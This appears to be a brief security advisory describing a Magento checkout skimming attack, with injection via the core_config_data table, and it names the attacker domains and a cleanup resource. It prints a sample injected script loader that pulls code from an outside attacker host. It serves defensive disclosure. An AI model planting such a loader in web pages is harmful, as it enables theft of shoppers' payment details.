Description: Injection of malicious scripts into Magneto checkout pages. The scripts steal entered payment details and send them to remote third-party sites.
The scripts are typically injected into the core_config_data table
Sample:
<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = '//mcloudjs[.]com/ext/htc.css?cloud=23555534255262'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>
Domain involed: googieapls[.]com, mcloudjs[.]com
For additional details check the Ecommerce security category of our blog.
Affecting: Magento
Mitigation How to clean a hacked Magento site